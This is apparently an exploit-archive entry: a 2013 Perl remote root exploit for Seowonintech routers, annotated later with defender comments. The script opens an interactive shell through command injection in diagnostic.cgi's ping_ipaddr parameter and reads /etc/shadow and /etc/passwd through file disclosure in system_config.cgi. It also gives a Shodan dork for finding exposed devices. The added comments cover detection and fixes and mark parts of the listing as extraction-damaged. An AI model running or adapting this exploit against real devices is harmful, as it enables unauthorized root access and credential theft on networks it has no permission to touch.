
# Title : Seowonintech Devices - Remote root Exploit
# Published : 2013-06-24
# Author :


#!/usr/bin/perl
#       
#  [+] Seowonintech all device remote root exploit v2
# =====================================================
# author:                 | email:
# Todor Donev  (latin)    | todor dot donev 
# ???e ???a  (cyrillic) | @googlemail.com    
# =====================================================
# type:    | platform:    | description:
# remote   | linux        | attacker can get root
# hardware | seowonintech | access on the device
# =====================================================
# greetings to:
# Stiliyan Angelov,Tsvetelina Emirska,all elite 
# colleagues and all my friends that support me. 
# =====================================================
# warning:
# Results about 37665 possible vulnerabilities
# from this exploit.
# =====================================================
# shodanhq dork: 
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
# =====================================================
# P.S. Sorry for buggy perl.. :)
# 2o13 Hell yeah from Bulgaria, Sofia
#
#    Stop Monsanto Stop Monsanto Stop Monsanto
#
#       FREE GOTTFRID SVARTHOLM WARG FREE
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder 
# who was sentenced to two years in jail by Nacka 
# district court, Sweden on 18.06.2013 for hacking into
# computers at a company that manages data for Swedish
# authorities and making illegal online money transfers.
 
use LWP::Simple qw/$ua get/;
# Top-level driver: turns the command-line argument into a base URL, probes
# the two CGI endpoints this script relies on, and hands off to rce() or rfd().
# NOTE(review): this listing looks extraction-damaged (for example "n" appears
# where a newline escape would be expected), so read it as a record of the
# technique rather than as working code.
#
# Defender summary, taken from the requests visible below:
#   * /cgi-bin/diagnostic.cgi    - ping diagnostic; its ping_ipaddr parameter
#                                  carries the injected command (see rce()).
#   * /cgi-bin/system_config.cgi - config "load" action; its file_name
#                                  parameter carries the file path (see rfd()).
# No credentials, cookies or session tokens are sent anywhere in this script,
# which suggests both endpoints answer unauthenticated requests - confirm
# against the device. The user agent is never overridden, so requests from an
# unmodified copy should carry the default LWP::Simple agent string.
# Mitigation: keep the device's web administration interface off untrusted
# networks, and check with the vendor for firmware that authenticates these
# endpoints and validates both parameters.
my $host  =  $ARGV[0] =~ /^http:/// ?  $ARGV[0]:  'http://' . $ARGV[0];
# The usage check runs only after $host has been built from $ARGV[0].
if(not defined $ARGV[0])
{
     usg();
     exit;
}
print "[+] Seowonintech all device remote root exploitn";
# Both probe URLs are plain string concatenations onto the base URL.
$diagcheck = $host."/cgi-bin/diagnostic.cgi";
$syscheck = $host."/cgi-bin/system_config.cgi";
# $ua is the user-agent object exported by LWP::Simple; its get() returns a
# response object, which is what status_line is called on below.
$res = $ua->get($diagcheck) || die "[-] Error: $!n";
print "[+] Checking before attack..n";
# status_line is a string such as "200 OK"; the numeric != relies on Perl
# reading its leading digits.
if($res->status_line != 200){
     print "[+] diagnostic.cgi Status: ".$res->status_line."n";
     }else{
     print "[o] Victim is ready for attack.n";
     print "[o] Status: ".$res->status_line."n";  
     # NOTE(review): as written, the match is applied to the response object
     # rather than to its body and is wrapped in defined(), so this branch
     # looks to be taken for any 200 response. When triaging captured output,
     # the banner lines below are therefore not evidence that the device was
     # actually vulnerable; rely on the device's own request logs instead.
     if(defined $res =~ m{selected>4</option>}sx){
     print "[+] Connected to $ARGV[0]n";
     print "[+] The fight for the future Beginsn";
     print "[+] Exploiting via remote command execution..n";
     print "[+] Permission granted, old friend.n";
     # rce() loops until the operator types exit/quit (or a request fails), so
     # the system_config.cgi path further down is only reached when
     # diagnostic.cgi did not return 200.
     &rce;
     }else{
     print "[!] Warning: possible vulnerability.n";
     exit;
    }   
  }
# Second probe: the configuration page used for file disclosure.
$res1 = $ua->get($syscheck) || die "[-] Error: $!n";
if($res1->status_line != 200){
     print "[+] system_config.cgi Status: ".$res1->status_line."n";
     exit;
     }else{
     print "[+] Trying to attack via remote file disclosure release.n";
     # NOTE(review): the substitution operates on the URL string in $syscheck,
     # not on the response held in $res1, so it does not test the device's
     # reply; the same caveat about the banner text applies here.
     if(defined $syscheck =~ s/value='/etc/'//gs){
     print "[+] Victim is ready for attack.n";
     print "[+] Connected to $ARGV[0]n";
     print "[o] Follow the white cat.n";
     print "[+] Exploiting via remote file dislocure..n";
     print "[+] You feeling lucky, Neo?n";
     &rfd;
     }else{
     print "[!] Warning: Possible vulnerability. Believe the unbelievable!n";
     exit;
    }
  }
# rfd: interactive loop that reads a file path from STDIN, requests it through
# system_config.cgi's file_name parameter (btn_type=load, action=APPLY) and
# prints whatever the page returns inside its textarea.
# Takes no arguments, reads the global $host, and only stops when get() fails
# and the die fires.
#
# Detection: requests to /cgi-bin/system_config.cgi whose file_name value is an
# absolute filesystem path. The script's own usage text names /etc/webpasswd,
# /etc/shadow and /etc/passwd, so on a device that served such requests the
# stored credentials should be treated as exposed and rotated.
# Root cause is not visible here; presumably the CGI opens file_name without
# restricting it to its own configuration files - confirm against the firmware.
sub rfd{
while(1){ 
     print "# cat ";
     chomp($file=<STDIN>);
     # An empty line prints the reminder but still falls through to the request.
     if($file eq ""){ print "Enter full path to file!n"; }
     # The path is appended to the query string as typed, without URL-encoding.
     $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
     $data=get($bug) || die "[-] Error: $ARGV[0] $!n";
     # Rewrites the literal "Null" in the reply; presumably that is what the
     # device returns for a missing file - not confirmed by this listing.
     $data =~ s/Null/File not found!/gs;
     # Prints the text captured between the rows="30"> attribute and the
     # closing textarea marker.
     if (defined $data =~ m{rows="30">(.*?)&lt;/textarea&gt;}sx){
     print $1."n";
     }
   }
}
# rce: interactive loop that takes each line typed on STDIN and sends it to
# diagnostic.cgi, placed after a ';' inside the ping_ipaddr parameter, then
# prints part of the response.
# Takes no arguments, reads the global $host, and ends only on exit/quit or
# when get() fails and the die fires.
#
# Root cause is not visible here; presumably the CGI builds a ping command
# line from ping_ipaddr and runs it through a shell without validation -
# confirm against the firmware.
# Detection: requests to /cgi-bin/diagnostic.cgi in which ping_ipaddr holds
# anything other than a plain address, in particular ';'. The fixed prefix
# "-q -s 0 127.0.0.1;" built below is a usable log signature for unmodified
# copies of this script.
# Device-side fix: accept only a syntactically valid address or hostname in
# ping_ipaddr and pass it to ping as a separate argument, never through a
# shell; require authentication for the diagnostic page.
sub rce{
while(1){ 
     print "# ";
     chomp($rce=<STDIN>);
     # The typed line is concatenated into the query string as-is.
     $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
     # Runs after $bug has already been built, so it does not change the
     # request; the listing is extraction-damaged here and the intent is unclear.
     $rce =~ s/|/;/;
     # An empty line prints the reminder but the request below is still sent.
     if($rce eq ""){print "enter Linux commandn";}
     # "clear" wipes the operator's own terminal (cls on Windows, clear
     # elsewhere); nothing here skips the request afterwards.
     if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
     # exit/quit end the script locally before any request is made.
     if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...n"; exit;}
     $data=get($bug) || die "[-] Error: $!n";
     # Captures the text ahead of "Content-type:" in the reply, cuts it at the
     # ' loss' (or ' ms') marker and strips that marker before printing;
     # presumably this trims the ping statistics from the output - TODO confirm.
     if (defined $data =~ m{(s.*) Content-type:}sx){
     $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
     $result =~ s/ lossn//;     
     $result =~ s/ msn//;
     print $result;
    }
  }
}
# usg: prints the usage banner and examples to STDOUT; takes no arguments and
# makes no network requests. It is called from the top level when no target
# argument is given.
# For defenders, the last example line names the files the author expected to
# read through the file-disclosure path (/etc/webpasswd, /etc/shadow,
# /etc/passwd), which indicates what to treat as exposed on an affected device.
sub usg
{
     print " [+] Seowonintech all device remote root exploitn";
     print " [!] by Todor Donev todor dot donev @ googlemail.comn";
     # $0 interpolates the script's own file name into the usage lines.
     print " [?] usg: perl $0 <victim>n";
     print " [?] exmp xpl USG: perl $0 192.168.1.1 :)n";
     print " [1] exmp xpl RCE: # uname -a :)n";
     print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :Pn";
}